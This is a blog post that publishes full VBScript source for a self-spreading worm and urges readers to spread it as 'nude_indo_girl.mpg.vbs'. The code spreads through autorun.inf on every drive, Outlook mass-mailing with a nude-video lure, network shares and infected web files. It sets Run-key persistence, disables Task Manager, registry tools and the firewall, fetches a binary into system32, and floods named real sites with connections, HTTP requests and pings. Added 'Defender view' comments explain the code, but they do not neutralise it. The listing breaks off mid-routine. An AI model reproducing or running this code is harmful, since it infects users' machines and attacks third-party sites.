
Tuesday, October 22, 2013

Kumpulan Script Virus

cara kerja virus ini :

- menginfeksi seluruh drive, menyebarkan diri via email(outlook), mirc, flashdisk, lan via network sharing
- worm ini juga mampu mengupdate diri dengan mendownload file update
- pada jam2 tertentu juga melakukan http request, syn,icmp ke website target hacker malaysia..

- infeksi seluruh drive, menyebarkan diri via email( outlook), mirc, flashdisk, lan via network sharing
-worm ini juga mampu mengupdate diri dengan mendownload file update
- pada jam jam tertentu juga melakukan http request, syn,icmp ke website target hacker malaysia:tbd,hmsecurity,sec-r1z,v4-team
monggo bagi yg mao ikut nyebarin worm ini

yg disebarkan adl nude_indo_girl.mpg.vbs (nama file tdk boleh diubah)


rem nude girl internet w0rm version 1.0
rem c0d3r : mywisdom
rem this intenet w0rm will spread via irc, lan, flash disk, drives, outlook email
rem to all my targets and enemies. you wanna play with me? ok you fight with my worm before fight with me
rem special thanks to all devilzc0de crews and members
rem special thanks to all jasakom crews and members
rem special thanks to all ycl crews and members
rem greetz to all solhack 2003-2004 crews
rem got r00t ???
rem this v1rus is made purposely for helping me in ddosing my targets
' Entry point of the sample: every routine in the listing is invoked once, in this fixed order.
' "On Error Resume Next" suppresses runtime errors for this statement run, so a failing
' step does not stop the steps that follow it.
on error resume next
Set mywisdom = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
' Opens the running script itself for reading (mode 1).
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
' NOTE(review): no object named "App" is created anywhere in the visible listing.
App.TaskVisible = False
' --- local persistence and drive-root copies ---
infek2()
infek_regiistry_sambil_boker()
infek_sistem()
infek_ie()
' --- downloads over plain HTTP (Winsock control, "update" script) ---
download_winsock()
download_winsock2()
download_update_worm1()
' --- propagation: local files, mapped network drives, mIRC, Outlook ---
infek_file_dan_web()
NetSpread()
sebar_ke_irc_1()
sebarkan_email_hahaha()
' --- time-gated outbound traffic to the hard-coded hosts ---
kirim_syn_target()
http_ddos_target()
kirim_icmp_target()
iframe_attack()
wget_attack1()
wget_attack2()
wget_attack3()
wget_attack4()
wget_attack5()
browsing()
infek_sistem()
Set mywisdom = CreateObject("WScript.Shell")
' anti_delete contains a Do...Loop with no exit condition in the visible code, so the
' two statements below are reached only if that call returns.
' Note for triage: disable_firewall is defined in the listing but does not appear in this call list.
anti_delete()
mywisdom.Sleep 100000
jalan()

' Launches nude_indo_girl.mpg.vbs (relative path) through WScript.Shell.Run.
' Detection hint: a script host process starting a file with a double extension (.mpg.vbs).
sub jalan()
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("nude_indo_girl.mpg.vbs")

mywisdom.Sleep 100000
end sub

Sub infek2()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "I:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
' Walks the collection returned by WScript.Network.EnumNetworkDrives (mapped network drives).
' For every non-empty item it copies the running script to the relative path
' "nude_indo_girl.mpg.vbs" and then passes the item to Dosearch.
' NOTE(review): Dosearch is not defined in the visible part of this listing, so what happens
' on the share cannot be stated from here.
' Defender view: write access to mapped shares is the exposure; monitor shares for new .vbs
' files and restrict write permissions to what users actually need.
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

' Tampers with files that sit in the same folder as the running script.
' For each file whose extension is php, html, htm, jsp, jpg, gif or png it reads the text of
' nude_indo_girl.mpg.vbs and appends that text, followed by the tag2 string, to the file
' (OpenTextFile mode 8 = append, create = True).
' Defender view: appended script text at the end of web or image files is the artefact to look
' for; file-integrity monitoring on web roots catches this class of modification.
sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
' Reads the whole worm file as text.
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
' The target is opened by bare file name, i.e. relative to the current directory.
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

'nonaktifkan firewall
' Turns off Windows Firewall for the current profile through the HNetCfg.FwMgr COM object.
' This routine does not appear in the top-level call list of the visible listing.
' Defender view: a firewall state change made by a script host is a high-signal event; alert on
' firewall-disabled events and enforce the firewall state through policy.
sub disable_firewall()
On Error Resume Next
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
end sub

'biar tetep eksis
' Self-preservation routine: caches the script's own text in memory, then loops forever checking
' whether the script file still exists and recreating it when it does not.
' The Do...Loop has no exit condition and no delay in the visible code.
' Defender view: stop the script host process before deleting the file, otherwise the file can
' be recreated; a script host pinned at high CPU is a visible symptom of this loop.
sub anti_delete()
On Error Resume Next
Set fso= Createobject("scripting.filesystemobject")
Set mywisdom2= fso.opentextfile(wscript.scriptfullname, 1)
' Whole script body kept in a variable for later restoration.
pengujian_keberadaan= mywisdom2.readall
mywisdom2.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set ada_terus= fso.createtextfile(wscript.scriptfullname, True)
' Presumably restores the cached contents — NOTE(review): confirm against a real sample.
ada_terus.writepengujian_keberadaan
ada_terus.Close
End If
Loop
end sub

'fungsi untuk syn dos ke target
' Hour-gated connection attempts to the hard-coded hosts on TCP port 80.
' The author labels this "SYN DoS"; the visible code creates MSWinsock.Winsock controls and calls
' connect on them, 16 times per host (21 times for the last host).
' Schedule taken from the conditions below (local clock of the infected machine):
'   12, 15, 16 -> tbd.my          18, 21, 22 -> sec-r1z.com
'   23, 3, 4   -> v4-team.com     6, 9, 10   -> hmsecurity.org     10 -> ardiantz.com
' Defender view: the host names and the MSWINSCK.OCX dependency are usable indicators; look for a
' script host making repeated outbound port-80 connections at these hours.
sub kirim_syn_target()
on error resume next
jam=Hour(Now())
' menit is assigned but not read in this routine.
menit=Minute(Now())
if jam=12 or jam=15 or jam=16 then
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "tbd.my"
winsock.RemotePort = 80
winsock.connect
next
' Only the object created in the last iteration is closed here.
winsock.close
end if

if jam=18 or jam=21 or jam=22 then
'syn sec-r1z.com
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "sec-r1z.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=23 or jam=03 or jam=04 or jam=3 or jam=4 then
'syn v4-team
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "v4-team.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=06 or jam=09 or jam=6 or jam=9 or jam=10 then
'syn hmsecurity.org
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "hmsecurity.org"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=10 then
'syn ardiantz.com
For i = 0 To 20
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "ardiantz.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
end sub

'fungsi kirim icmp pada tanggal tanggal tertentu yang udah diset
' Day-of-month gated ICMP traffic: on day 12, 22 or 2 it runs the system ping command against one
' hard-coded host with a 1000-byte payload (-l 1000) and ten echo requests (-n 10).
' Defender view: a script host spawning ping with an oversized payload argument is the process
' pattern to alert on; the host names are indicators.
sub kirim_icmp_target()
hari=Day(now())
if hari=12 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping tbd.my -l 1000 -n 10")
end if

if hari=22 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping ardiantz.com -l 1000 -n 10")
end if

if hari=02 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping hmsecurity.org -l 1000 -n 10")
end if
end sub

' Time-gated HTTP GET requests to the hard-coded hosts using MSXML2.XMLHTTP.
' All requests are synchronous (third argument of open is False) and the responses are not read.
' Two triggers are visible:
'   - minute of the hour greater than 55: six rounds of one GET to each of the five hosts;
'   - specific hours per host: eleven GETs to that host.
' Defender view: plain-HTTP requests to these hosts issued by a script host rather than a browser
' are the network indicator; proxy logs show them with the MSXML user agent of the machine.
sub http_ddos_target()
on error resume next
Dim o
menit=Minute(Now())
jam=Hour(Now())

' request to the target sites every hour
if menit>55 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
Set x = CreateObject("MSXML2.XMLHTTP")
x.open "GET", "http://sec-r1z.com", False
x.send
Set r = CreateObject("MSXML2.XMLHTTP")
r.open "GET", "http://hmsecurity.org", False
r.send
Set y = CreateObject("MSXML2.XMLHTTP")
y.open "GET", "http://v4-team.com", False
y.send
Set z = CreateObject("MSXML2.XMLHTTP")
z.open "GET", "http://ardiantz.com", False
z.send

next
end if

'http req tbd
if jam=10 or jam=14 or jam=15 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
next
end if

'http req sec-r1z
if jam=16 or jam=18 or jam=19 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://sec-r1z.com", False
o.send
next
end if

'http req v4-team.com
if jam=20 or jam=22 or jam=23 or jam=24 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://v4-team.com", False
o.send
next
end if

'http req hmsecurity.org
if jam=23 or jam=01 or jam=02 or jam=1 or jam=2 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://hmsecurity.org", False
o.send
next
end if

'http req ardiantz.com
if jam=20 or jam=22 or jam=23 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com", False
o.send
next
end if
end sub

'penyebaran ke email via outlook diambil dari potongan kode virus i love you
' Mass-mailing routine driven through Outlook automation (Outlook.Application / MAPI namespace).
' It walks every address list and every entry in it, and for entries without a marker in the
' registry it creates a mail item with the fixed subject and body below, attaches the worm file
' and sends it. Markers are written so the same address is not mailed twice.
' The marker names are built as "HKEY_CURRENT_USER\Software\Microsoft\WAB" & <name> with no
' separator, so they appear as values under HKCU\Software\Microsoft whose names start with "WAB".
' Defender view: the fixed subject line, the .mpg.vbs attachment name and those registry values
' are indicators; blocking script attachments at the mail gateway and keeping Outlook's
' programmatic-access protection enabled address this vector.
sub sebarkan_email_hahaha()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
' Per-list marker: number of entries already processed for this address list.
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
' Per-address marker: empty means this address has not been mailed yet.
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead)
if (regad="") then
' CreateItem(0) creates a mail item.
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "Free Indonesian Girl Nude Scandal Video for You"
male.Body = vbcrlf&"Free Indonesian Girl Nude Scandal Video for You!!! check the attachment. Or download now, click here to download this video: nude_indo_girl.mpg [download] , mirror download: nude_indo_girl.mpg [mirror download]"
male.Attachments.Add(dirsystem&"\nude_indo_girl.mpg.vbs")
male.Attachments.add(App.Path & "" & "nude_indo_girl.mpg.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

'pertahanan diri virus aka self defense
' Registry persistence and tamper routine. Every value below is written through WScript.Shell.RegWrite:
'   - two Avira AntiVir_Desktop values under HKLM are overwritten with a wscript.exe command line;
'   - a Run value named "Stask" under HKLM starts the worm with wscript.exe at logon;
'   - Explorer "Advanced" values Hidden, HideFileExt and ShowSuperHidden are set to 1
'     (HideFileExt = 1 hides known extensions, so "nude_indo_girl.mpg.vbs" displays as ".mpg");
'   - policy values DisableRegistryTools and DisableTaskMgr are set to 1 for the current user.
' The HKLM writes need administrative rights; the HKCU writes do not.
' Defender view: these value names are both detection points and the clean-up checklist — remove
' the Run\Stask value, reset the two policy values and restore the Explorer settings.
sub infek_regiistry_sambil_boker()
dim win,mywisdom
Set fso = CreateObject("Scripting.FileSystemObject")
' Folder the running script was started from; used to build the command line.
win = fso.GetParentFolderName(Wscript.ScriptFullName)
Set mywisdom = CreateObject("WScript.Shell")
With mywisdom

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\Path", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\AppDataDirectory", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stask", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
end sub

'strategi perang : siksa musuh pelan pelan
' Browser hijack: overwrites the Internet Explorer start page for the current user with one of
' the hard-coded hosts, chosen by day of the week (Weekday's default numbering starts at Sunday = 1).
' It uses the mywisdom shell object created at the top level of the script.
' Defender view: an unexpected value in HKCU\...\Internet Explorer\Main\Start Page pointing at
' one of these hosts is an infection indicator; reset it during clean-up.
sub infek_ie()
on error resume next
dim hari
hari=Weekday(date)
if hari=1 or hari=2 then
' IE start page is set to sec-r1z.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://sec-r1z.com","REG_SZ"
elseif hari=3 or hari=4 then
' IE start page is set to v4-team.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://v4-team.com","REG_SZ"
elseif hari=5 then
' IE start page is set to ardiantz.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://ardiantz.com","REG_SZ"
else
' IE start page is set to tbd.my
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://tbd.my","REG_SZ"
end if
end sub

'teknik infeksi dan penyebaran di sistem dan semua drive serta menyembunyikan diri
' Local and removable-drive propagation through autorun.inf.
' Steps visible in the code:
'   1. runs "del autorun.inf", then appends a single "Open=" line naming the worm to autorun.inf
'      in the current directory (OpenTextFile mode 8 = append, create = True);
'   2. marks autorun.inf and the worm file read-only with attrib +r;
'   3. copies the worm to a fixed list of paths: the Windows directory, system32, an XAMPP htdocs
'      folder, the root of C: and the roots of drives D: through Z:;
'   4. copies autorun.inf to the same list of locations.
' The third argument of CopyFile is 0 (overwrite = False), so existing files are not replaced.
' Defender view: the pair autorun.inf + nude_indo_girl.mpg.vbs in a drive root is the artefact to
' search for; disabling AutoRun for removable and network drives removes this launch path.
Sub infek_sistem()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
mywisdom.run("attrib +r autorun.inf")
mywisdom.run("attrib +r nude_indo_girl.mpg.vbs")

' Folder the running script was started from; source of both copies below.
win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

' Source (satu) and destination paths for the worm file itself.
satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "i:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

' Copy the worm to every destination; failures are ignored because of On Error Resume Next.
fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

' Destination paths for autorun.inf, mirroring the list above.
duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

' Downloads MSWINSCK.OCX over plain HTTP and writes it to c:\windows\system32, deleting any file
' already at that path. The Winsock control is what kirim_syn_target instantiates.
' The download uses MSXML2.XMLHTTP (synchronous GET) and ADODB.Stream in binary mode (Type = 1).
' Nothing in the visible code verifies the content of the downloaded file.
' Defender view: a script host fetching a binary over HTTP and writing into system32 is a strong
' behavioural indicator; the URL and the XMLHTTP + ADODB.Stream pairing are both worth a rule.
sub download_winsock()
strFileURL = "http://ardiantz.com/~checking/wp-includes/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

' Only an HTTP 200 response is written to disk.
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
' An existing file at the destination is removed before saving.
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
